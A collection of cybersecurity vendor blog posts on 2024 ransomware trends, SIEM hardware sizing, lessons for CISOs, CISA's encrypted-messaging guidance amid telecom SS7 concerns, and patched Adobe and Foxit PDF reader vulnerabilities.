  • Example: In 2024, a global automotive manufacturer was hit by ransomware that halted production for weeks, leading to millions in losses and delayed product deliveries.

Prediction for 2025: As industrial control systems (ICS) and IoT devices become more interconnected, ransomware targeting these environments will grow. Organizations must prioritize securing operational technology (OT) networks.

8. Decline in Average Ransom Payment but Higher Incident Costs

While the average ransom payment dropped from $850,000 to $569,000 in 2024, the overall cost of ransomware incidents has risen due to operational disruptions, data recovery expenses, and reputational damage.

  • Example: A mid-sized retail company paid a lower ransom in 2024 but incurred over $3 million in total costs due to lost sales, customer churn, and recovery efforts.

Prediction for 2025: Organizations may see lower ransom demands, but the indirect costs of ransomware attacks will continue to climb. This highlights the importance of proactive defenses and comprehensive incident response plans.

9. Evolving Ransomware Variants

New ransomware variants with enhanced capabilities emerged in 2024, including Akira and BlackCat, which feature advanced encryption and stealth techniques.

  • Example: Akira ransomware targeted a European bank, using multi-layered encryption that rendered recovery nearly impossible without paying the ransom.

Prediction for 2025: Ransomware variants will continue to evolve, focusing on bypassing traditional defenses and targeting cloud environments and hybrid work setups.

10. Increased International Collaboration and Crackdowns

Law enforcement agencies and cybersecurity organizations have intensified their efforts to combat ransomware through international collaboration. In 2024, several high-profile ransomware groups were dismantled, and stolen funds were recovered.

  • Example: A joint operation by the FBI and Europol in 2024 disrupted a major ransomware operation, recovering $20 million in ransom payments.

Prediction for 2025: While these crackdowns are promising, ransomware groups will adapt and find new ways to evade law enforcement. Continued international collaboration will be critical to countering these threats.

Looking Ahead to 2025

As we move into 2025, the ransomware landscape will continue to evolve. Here are some key predictions:

  1. AI-Powered Ransomware: Attackers will leverage artificial intelligence to automate ransomware campaigns and improve phishing success rates.
  2. Focus on Cloud Environments: With more businesses migrating to the cloud, ransomware groups will target cloud-native applications and services.
  3. Stricter Regulations: Governments will implement more stringent reporting and compliance requirements for ransomware incidents.
  4. Cyber Insurance Challenges: The cost of cyber insurance will rise, with stricter conditions for coverage related to ransomware.
  5. Post-Attack Recovery Services: Organizations will invest more in post-attack recovery services, such as takedown solutions and data restoration.

To Sum Up

The ransomware trends of 2024 highlight threat actors‘ adaptability and ingenuity. To stay ahead of these evolving threats, organizations must adopt a proactive approach, including strong cybersecurity measures, employee awareness programs, and collaborative efforts with industry peers and law enforcement.

By understanding the tactics and strategies employed by ransomware groups, businesses can better prepare for the challenges that lie ahead in 2025 and beyond.

Source:

https://cyble.com/knowledge-hub/ransomware-tactics-adopted-by-threat-actors-in-2024/

https://www.statista.com/topics/4136/ransomware/#topicOverview

Monthly Ransomware Threat Intelligence 2027.pdf

The post Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025 appeared first on Cyble.

Blog – Cyble – ​Read More

Hardware for SIEM systems | Kaspersky official blog

At some point, the information security department of any large company inevitably begins to consider introducing a SIEM system — or replacing the existing one, and must therefore estimate the budget required for its deployment. But SIEM isn’t a lightweight product that can be deployed within existing infrastructure. Almost all solutions in this category require additional hardware, meaning that equipment must be purchased or rented.

So, for accurate budgeting, it’s necessary to take into account the expected hardware configuration. In this post, we discuss how SIEM hardware requirements change depending on the company’s profile and system’s architecture, and provide rough parameters to help estimate the preliminary cost of such equipment.

Evaluating the data flow

Essentially, a SIEM system collects event data from internal and external sources and identifies security threats by correlating this data. Therefore, before considering what hardware will be required, it’s essential to first assess the volume of information the system will process and store. To this end, you need to first identify critical risks to the infrastructure, and then determine the data sources that must be analyzed to help detect and address threats related to these risks. These are the data sources to focus on. Such an assessment is necessary not only to determine the required hardware, but also to estimate the cost of licensing. For example, the cost of licensing for our Kaspersky Unified Monitoring and Analysis Platform SIEM system directly depends on the number of events per second (EPS). Another important aspect is to check how the vendor calculates the number of events for licensing. In our case, we take the events per second after filtering and aggregation, calculating the average number of events over the past 24 hours rather than their peak values — but not all vendors follow this approach.

The most common sources include endpoints (Windows events, Sysmon, PowerShell logs, and antivirus logs), network devices (firewalls, IDS/IPS, switches, access points), proxy servers (such as Squid and Cisco WSA), vulnerability scanners, databases, cloud systems (such as AWS CloudTrail or Office 365), and infrastructure management servers (domain controllers, DNS servers, and so on).

As a rule, to form preliminary expectations about the average event flow, the size of the organization can serve as a guide. However, the architectural particularities of specific IT infrastructure can make company size a less decisive parameter.

In general, for small and medium-sized organizations with just one office — or up to several offices with good communication channels among them and IT infrastructure located in a single data center — an average event flow of 5000–10 000 EPS can be expected. For large companies, making an estimate is more challenging: depending on the complexity of the infrastructure and the presence of branches, EPS can range from 50 000 to 200 000 EPS.

Architectural components of an SIEM system

An SIEM system generally consists of four main components: the management subsystem, event collection subsystem, correlation subsystem, and storage subsystem.

Core (management subsystem). You can think of this as the control center of the system. It allows managing the other components, and provides visualization tools for SOC analysts — enabling them to easily configure operational parameters, monitor the SIEM system’s state, and, most importantly, view, analyze, sort and search events, process alerts, and work with incidents. This control center needs to also support log viewing through widgets and dashboards, and enable quick data search and access.

The core is an essential component and can be installed as a single instance or as a cluster to provide a higher level of resilience.

Event collection subsystem. As the name suggests, this subsystem collects data from various sources and converts it into a unified format through parsing and normalization. To calculate the required capacity of this subsystem, one must consider both the event flow intensity and the log format in which events arrive from sources.

The server load depends on how the subsystem processes logs. For example, even for structured logs (Key Value, CSV, JSON, XML), you can use either regular expressions (requiring significantly more powerful hardware) or the vendor’s built-in parsers.

Correlation subsystem. This subsystem analyzes data collected from logs, identifies sequences described in correlation rule logic, and, if necessary, generates alerts, determines their threat levels, and minimizes false positives. It’s important to remember that the correlator’s load is also determined not only by the event flow but by the number of correlation rules and the methods used to describe detection logic as well.

Storage subsystem. An SIEM system must not only analyze but also store data for internal investigations, analytics, visualization and reporting, and in certain industries — for regulatory compliance and retrospective alert analysis. Thus, another critical question at the SIEM system design stage is how long you want to store collected logs. From an analyst’s perspective, the longer the data is stored, the better. However, a longer log retention period increases hardware requirements. A mature SIEM system provides the ability to strike a balance by setting different retention periods for different log types. For example, 30 days for NetFlow logs, 60 days for Windows informational events, 180 days for Windows authentication events, and so on. This allows data to be optimally allocated across available server resources.

It’s also important to understand what volume of data will be stored using hot storage (allowing quick access) and cold storage (suitable for long-term retention). The storage subsystem must offer high performance, scalability, cross-storage search capabilities (both hot and cold), and data viewing options. Additionally, the ability to back up stored data is essential.

Architectural features of Kaspersky SIEM

So, we’ve laid out the ideal requirements for an SIEM system. It probably won’t surprise you that our Kaspersky Unified Monitoring and Analysis Platform meets these requirements. With its built-in capability to scale for data flows reaching hundreds of thousands of EPS within a single instance, our SIEM system isn’t afraid of high loads. Importantly, it doesn’t need to be split into multiple instances with correlation results reconciled afterwards — unlike many alternative systems.

The event collection subsystem of the Kaspersky Unified Monitoring and Analysis Platform system is equipped with a rich set of parsers optimized for processing logs in each format. Additionally, the multi-threading capabilities of Go mean the event flow can be processed using all available server resources.

The data storage subsystem used in our SIEM system consists of servers that store data, and servers with the clickhouse-keeper role, which manage the cluster (these servers don’t store data themselves but facilitate coordination among instances). For data flows of 20 000 EPS with a relatively low number of search queries, these services can operate on the same servers that store the data. For higher data flows, it’s recommended to separate these services. For instance, they can be deployed on virtual machines (a minimum of one is required, though three are recommended).

The Kaspersky Unified Monitoring and Analysis SIEM storage system is flexible — allowing event flows to be distributed across multiple spaces, and specifying the storage depth for each space. For example, inexpensive disks can be used to create cold storage (where searches are still possible, just slower). This cold storage can house data that is unlikely to require analysis but must be stored due to regulatory requirements. Such information can be moved to cold storage literally the day after it’s collected.

Thus, the data storage approach implemented in our SIEM system enables long-term data retention without exceeding the budget on expensive equipment, thanks to hot and cold storage capabilities.

SIEM architecture deployment using our SIEM as an example

The Kaspersky Unified Monitoring and Analysis Platform supports multiple deployment options, so it’s important first to determine your organization’s architecture needs. This can be done based on the estimated EPS flow, and the particularities of your company. For simplicity, let’s assume the required data retention period is 30 days.

Data flow: 5000–10 000 EPS

For a small organization, the SIEM system can be deployed on a single server. For example, our SIEM system supports the All-in-One installation option. In this case, the required server configuration is 16 CPUs, 32GB of RAM, and a 2.5TB of disk space.

Data flow: 30 000 EPS

For larger organizations, separate servers are needed for each SIEM component. Dedicating a server exclusively for storage ensures that search queries don’t affect the processing of events by the collector and correlator. However, the collector and correlator services can still be deployed together (or separately, if desired). An approximate equipment configuration for this scenario is as follows:

  • Core: 10 CPUs, 24GB of RAM, 0.5TB of disk space
  • Collector: 8 CPUs, 16GB of RAM, 0.5TB of disk space
  • Correlator: 8 CPUs, 32GB of RAM, 0.5TB of disk space
  • Storage: 24 CPUs, 64GB of RAM, 14TB of disk space

Data flow: 50 000–200 000 EPS

For large enterprises, additional factors must be considered when defining the architecture. These include ensuring resilience (as the substantial data-flow increases the risk of failure) and the presence of company divisions (branches). In such cases, more servers may be required to install the SIEM system, as it’s preferable to distribute collector and correlator services across different servers for such high EPS flows.

Data flow: 200 000 EPS

As EPS flows grow and the infrastructure divides into separate independent units, the amount of equipment required increases accordingly. Additional servers will be needed for collectors, storage, correlators, and keepers. Moreover, in large organizations, data availability requirements may take precedence. In this case, the Kaspersky Unified Monitoring and Analysis Platform storage cluster divides all collected events into shards. Each shard consists of one or more data replicas. And each shard replica is a cluster node, meaning a separate server. To ensure resilience and performance, we recommend deploying the cluster with two replicas per shard. For processing such large EPS volumes, three collector servers may be required, installed in the offices with the highest event flows.

Kaspersky SIEM in holding companies

In large enterprises, the cost of implementing an SIEM system increases not only with the volume of data, but also depending on the usage profile. For example, in some cases (such as MSP and MSSP environments, as well as large holding companies with multiple subsidiaries or branches), multi-tenancy is required. This means the company needs to maintain multiple “mini-SIEMs”, which operate independently. Our solution enables this through a single installation at the head office, without the need to install separate systems in/at each branch/tenant. This significantly reduces equipment costs.

SIEM scheme

Let’s imagine either (i) a holding company, (ii) a vertically-integrated enterprise, or (iii) a geographically-distributed corporation with either various independent security teams or a need to isolate data access among branches. The Kaspersky Unified Monitoring and Analysis Platform tenant model allows for segregated access to all resources, events, and third-party integration settings. This means one installation functions as multiple separate SIEM systems. In this case, while each tenant can develop its own content (correlation rules), there’s also the option of distributing a unified set of resources across all divisions. In other words, each division can have its own collectors, correlators, and rules, but the HQ security team can also assign standardized bundles of security content for everyone — ensuring consistent protection across the organization.

SIEM in holding

Thus, using the Kaspersky Unified Monitoring and Analysis Platform ensures the necessary performance with relatively modest computing resources. In some cases, savings on hardware can reach up to 50%.

For a more accurate understanding of the required resources and implementation costs, we recommend talking with our specialists or integration partners. We (or our partners) can also provide premium support, assist in developing additional integrations (including using API capabilities for connected products), and oversee the deployment of a turnkey solution covering system design, equipment estimation, configuration optimization, and much more. Learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, on the official product page.

Kaspersky official blog – ​Read More

Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024

Cyble | lessons for CISO

The year 2024 has been a rollercoaster for cybersecurity professionals worldwide. From ransomware attacks paralyzing critical industries to insider threats causing massive data breaches, the challenges for Chief Information Security Officers (CISOs) and cybersecurity teams have been relentless. These cyberattacks and data breaches highlight the importance of adapting strategies and learning from past events to secure organizations better as cyber threats evolve. 

Here are the top five lessons for CISO and cybersecurity professionals should learn from as 2025 begins. 

Lessons from 2024 that CISOs Must Carry Forward 

1. Human Error Remains the Biggest Cyber Vulnerability 

A staggering 84% of CISOs in countries like Saudi Arabia, Canada, France, and South Korea identified human error as their organization’s greatest cybersecurity weakness in 2024. This vulnerability extends to phishing attacks, misconfigurations, poor credential management, and insider threats. 

Case in Point: The Star Health Insurance Breach 

In August 2024, India’s largest health insurer, Star Health, suffered a data breach exposing millions of customer medical reports and personal details. The threat actor “xenZen” accused the company’s CISO of insider collusion, sharing a screenshot alleging that credentials were leaked via email. 

This Star Health Insurance data breach highlights two key lessons: 

  • Cybersecurity training needs to go beyond awareness: Employees, especially those handling sensitive data, must undergo regular, scenario-based training. 

  • Strengthen insider threat detection: Advanced monitoring tools and strict access controls can help detect suspicious activities before they escalate into full-blown breaches. 

2. Multi-Factor Authentication (MFA) Is Non-Negotiable 

In 2024, weak or absent MFA emerged as a common denominator in several high-profile breaches. Attackers exploited credential weaknesses to gain access to sensitive systems, causing significant damage. 

Case in Point: The Snowflake Breach 

The U.S.-based cloud storage company Snowflake experienced a breachwhere compromised credentials—obtained through malware—were used to access sensitive customer data. The lack of MFA enforcement on demo accounts allowed hackers to compromise the data of high-profile clients like TicketMaster and LendingTree. 

Lesson Learned: 

  • Implement MFA universally: Every account, internal or external, must have MFA enabled. A single weak link can jeopardize the entire ecosystem. 

  • Enforce credential hygiene: Regularly rotate credentials, monitor for leaked credentials on the dark web, and implement strong password policies. 

3. Ransomware Is Evolving—So Must Your Defenses 

Ransomware attacks continued to dominate headlines in 2024, with 41% of CISOs worldwide naming it a top cybersecurity risk. These attacks increasingly targeted critical infrastructure and essential service providers, making their impact devastating. 

Case in Point: The CDK Global Ransomware Attack 

In June 2024, CDK Global, a software provider for car dealerships, was hit by a ransomware attack that disrupted operations for over 15,000 dealerships. Major companies like Asbury Automotive and Lithia Motors had to revert to manual processes, resulting in financial losses and customer dissatisfaction. 

Lesson Learned: 

  • Strengthen endpoint protection: Implement advanced threat detection tools to identify and stop ransomware before it spreads. 

  • Create vigorous incident response plans: Include regular backups, tabletop exercises, and quick recovery protocols to minimize downtime. 

4. The Supply Chain Is a Critical Weak Link

Cybercriminals increasingly exploited vulnerabilities in supply chains, targeting third-party vendors to gain access to larger organizations. 

Case in Point: The Dell Data Breach 

In 2024, Dell confirmed a data breach exposing 49 million customer purchase records. While financial data remained secure, the stolen information was sufficient to launch phishing and smishing attacks. 

Case in Point: The Ascension Health Cyberattack 

A massive cyberattack on Ascension Health disrupted clinical operations, forcing the nonprofit health system to disconnect from some business partners. The attack led to an additional operating loss of $1.8 billion for the fiscal year. 

Lesson Learned: 

  • Conduct thorough vendor risk assessments: Before partnering with third-party vendors, evaluate their cybersecurity posture. 

  • Mandate compliance with security standards: Require vendors to adopt strong security practices like SOC 2 compliance and regular penetration testing. 

5. Customer Trust Is Harder to Rebuild After a Breach

In 2024, cyberattacks had far-reaching consequences beyond financial losses. According to statistics, 47% of respondents indicated that attracting new customers became significantly harder after a data breach. 

Case in Point: Change Healthcare (CHC) Ransomware Attack 

In February 2024, Change Healthcare fell victim to a ransomware attack linked to the BlackCat group. With sensitive health data of over 110 million individuals exposed, the incident eroded trust among customers. Despite offering credit monitoring services, the reputational damage proved difficult to mitigate. 

Lesson Learned: 

  • Be transparent and proactive: When breaches occur, communicate quickly, outline steps taken to mitigate the impact, and offer affected customers tangible support. 

  • Invest in brand reputation management: Build a strong security narrative and a culture of trust through certifications, audits, and visible cybersecurity initiatives. 

Actionable Takeaways for CISOs and Cybersecurity Professionals 

As the threat landscape becomes increasingly complex, organizations must adopt a multi-faceted approach to cybersecurity. Incorporating advanced tools and platforms can significantly enhance CISO’s ability to address modern threats and safeguard their enterprise. 

Tools like Cyble Vision provide a comprehensive suite of capabilities that can empower organizations to identify, monitor, and mitigate threats across their digital footprint. For example: 

  • Attack Surface Management: Proactively identify and mitigate vulnerabilities by gaining a complete view of your organization’s external attack surface. 

  • Brand Intelligence: Protect against online brand abuse, including phishing and fraudulent domains, to safeguard customer trust and your organization’s reputation. 

  • Dark Web Monitoring: Stay ahead of cybercriminals with continuous monitoring of dark web activities, uncovering leaked credentials, sensitive data, and emerging threats. 

  • Cyber Threat Intelligence: Leverage AI-driven insights and continuous monitoring to detect and counteract evolving cyber threats in real time. 

  • Takedown and Disruption Services: Address malicious campaigns effectively by removing fraudulent websites and disrupting attack operations. 

  • Third-Party Risk Management: Identify and mitigate risks from vendors and external collaborators, ensuring security in your business partnerships. 

  • Vulnerability Management: Use advanced scanning and remediation tools to address vulnerabilities before they are exploited. 

These capabilities, combined with features like digital forensics, incident response, and executive monitoring, enable CISOs to adopt a proactive, intelligence-led approach to managing cybersecurity challenges. Solutions like Cyble’s provide the visibility and tools needed to stay ahead of adversaries, reduce exposure, and protect critical assets. 

By integrating such advanced tools into their cybersecurity frameworks, CISOs can not only address existing risks but also build resilience against future threats, ensuring their organization’s digital security is always one step ahead. 

To Sum Up 

The lessons from 2024’s high-profile cyberattacks highlight the need for a shift from reactive to proactive cybersecurity strategies. With 38% of CISOs identifying malware as a top risk and 29% pointing to email fraud and DDoS attacks, it’s clear that the threat landscape continues to evolve at an alarming pace.  

However, as businesses navigate these challenges, the focus must remain on fortifying human and technological defenses, building cyber resilience, and fostering transparency in post-breach communication. 

As organizations worldwide grapple with the dual pressures of digital transformation and escalating cyber threats, the stakes have never been higher. Learning from the mistakes and successes of 2024 will empower CISOs and cybersecurity professionals to build stronger, more adaptive defenses—ensuring not just survival but success in the face of cyber adversity. 

The post Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024 appeared first on Cyble.

Blog – Cyble – ​Read More

CISA Recommends Encrypted Messaging Apps as Telecom Security Questioned 

Cyble | Telecom networks

The security of U.S. telecom networks has come under fresh scrutiny in recent months, with the latest example coming this week when the Cybersecurity and Infrastructure Security Agency (CISA) recommended that individuals in need of high security use encrypted messaging apps for mobile communications. 

Concern grew in October when CISA and the FBI confirmed that China-linked threat actors had infiltrated telecom networks in an attempt to spy on President-elect Donald Trump and the campaign of Vice President Kamala Harris, among other top U.S. officials. 

Congressional hearings followed, including an extraordinary admission from Senator Mark Warner that “thousands and thousands and thousands” of vulnerable telecom network devices might need to be replaced. 

“Unlike some of the European countries where you might have a single telco, our networks are a hodgepodge of old networks,” Warner told the Washington Post. “The big networks are combinations of a whole series of acquisitions, and you have equipment out there that’s so old it’s unpatchable.” 

Guidance earlier this month from U.S. cyber and national security agencies and counterparts in Canada, Australia and New Zealand offered comprehensive advice for hardening and securing global telecom networks in light of the attacks, and the U.S. Federal Communications Commission (FCC) said it would take steps to mandate stronger telecom security. 

Attention Turns to SS7 and Diameter as List of Attackers Grows 

Recently, the security of the 40-year-old Signaling System No. 7 (SS7) telecom protocols used in 2G and 3G SMS and phone services – as well as international roaming – came under renewed scrutiny over SS7’s potential to allow location tracking, interception of voice data and multi-factor authentication keys, as well as the protocol’s potential as a spyware delivery vector. The 4G and 5G Diameter protocol also has location tracking vulnerabilities, and 4G and 5G users could also find themselves downgraded to SS7 when roaming. 

Senator Ron Wyden earlier this month released 23 pages of correspondence with the U.S. Department of Defense (DoD) detailing insecurities in telecom messaging systems and the SS7 and Diameter protocols. Wyden and Senator Eric Schmitt asked DoD Inspector General Robert Storch to “investigate the Department of Defense’s (DOD) failure to secure its unclassified telephone communications from foreign espionage.” 

“Teams and certain other platforms utilized by DOD are not end-to-end encrypted by default, causing concerning gaps in security that could easily be mitigated,” the Senators wrote. “End-to-end encrypted voice, video, and text messaging tools such as Signal, WhatsApp, and FaceTime better protect communications in the event that the company that offers the service is hacked.” 

DoD has begun limited pilots of a potentially more secure platform known as Matrix that is widely used by NATO allies, but the senators said the Defense Department needs to do more. 

The letter included a number of appendices detailing correspondence between Wyden’s staff and the DoD. 

In one, Wyden’s staff asked the DoD if it agreed with three statements by the Department of Homeland Security on SS7’s and Diameter’s security shortcomings that were included in a 2017 report – and the DoD responded that it agreed with the statements. 

The three DHS statements the DoD agreed with are: 

  • DHS “believes that all U.S. carriers are vulnerable to [SS7 and Diameter] exploits, resulting in risks to national security, the economy, and the Federal Government’s ability to reliably execute national essential functions.” 

  • DHS “believes SS7 and Diameter vulnerabilities can be exploited by criminals, terrorists, and nation-state actors/foreign intelligence organizations.” 

  • DHS “believes many organizations appear to be sharing or selling expertise and services that could be used to spy on Americans.” 

Wyden also said he had seen an unreleased CISA report from 2022 detailing U.S. telecom security issues that contained “alarming details about SS7-related surveillance activities involving U.S. telecommunications networks.” 

Wyden asked if DoD was “aware of any incidents in 2022 or 2023 in which DoD personnel, whether located in the U.S. or outside the U.S, were surveilled through SS7 and Diameter enabled technologies?” 

The DoD replied that the question “Requires a classified response.” 

Wyden sent the DoD a slide from a 2017 DHS event (not included in the documents) that identified the “primary countries reportedly using telecom assets of other nations to exploit U.S. subscribers. Those countries, according to the DHS presentation, are Russia, China, Israel and Iran.” 

Wyden said Russia, China, Israel and Iran had also used telecom assets of countries in Africa, Central and South America, Europe, the Middle East, and Africa to “attack US subscribers … indicating that these foreign governments are using SS7 to target U.S. users, and that these SS7 attack are being routed through 3rd country networks.” 

Asked if it agreed with those assessments, the DoD replied that it “is not in a position to render an assessment without access to the underlying data that informed this presentation.” 

CISA’s Encrypted Messaging Guidance 

With that background, CISA’s guidance issued this week merits particularly close attention by anyone engaged in sensitive communications, especially those who may come under international roaming. 

The CISA document includes specific recommendations for Android and iPhone devices, but general guidance includes: 

  • Using a free messaging application for secure communications that guarantees end-to-end encryption, such as Signal or similar apps. 

  • Enable Fast Identity Online (FIDO) phishing-resistant authentication. 

  • Take inventory of valuable accounts, including email and social media and review any accounts where information leakage would benefit threat actors 

  • Enroll each account in FIDO-based authentication, especially Microsoft, Apple, and Google accounts. Once enrolled in FIDO-based authentication, disable other less secure forms of MFA. 

  • For Gmail users, enroll in Google’s Advanced Protection (APP) program to strengthen defenses against phishing and account hijacking. 

  • Migrate away from Short Message Service (SMS)-based MFA and disable SMS as a second factor for authentication. 

  • Use a password manager to store all passwords. 

  • Set a Telco PIN and MFA for mobile phone accounts to protect against SIM-swapping techniques. 

The post CISA Recommends Encrypted Messaging Apps as Telecom Security Questioned  appeared first on Cyble.

Blog – Cyble – ​Read More

Acrobat out-of-bounds and Foxit use-after-free PDF reader vulnerabilities found

Acrobat out-of-bounds and Foxit use-after-free PDF reader vulnerabilities found

Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader, and two use-after-free vulnerabilities in Foxit Reader.  

These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. 

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. Adobe’s patched this in version 24.005.20320, and Foxit’s patch appears in PDF Editor version 12.1.9/11.2.12.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Out-of-bounds read Adobe Acrobat Reader Vulnerabilities 

Discovered by  KPC.  

Specially crafted font files embedded into a PDF can trigger out-of-bounds memory reads in TALOS-2024-2076 (CVE-2024-49534), TALOS-2024-2070 (CVE-2024-49533), and TALOS-2024-2064 (CVE-2024-49532), which could lead to the disclosure of sensitive information and further exploitation. An attacker must trick the user into opening a malicious file to trigger these vulnerabilities. 

Foxit object use-after-free vulnerabilities 

Discovered by KPC. 

Two use-after-free vulnerabilities exist in the way Foxit Reader handles certain objects. TALOS-2024-2093 (CVE-2024-49576) and TALOS-2024-2094 (CVE-2024-47810) can be triggered by malicious JavaScript code in a PDF file. An attack needs to either trick a user into opening the malicious file, or the user must navigate to a maliciously crafted website while the Foxit browser extension is enabled. This vulnerability can lead to memory corruption and result in arbitrary code execution. 

Cisco Talos Blog – ​Read More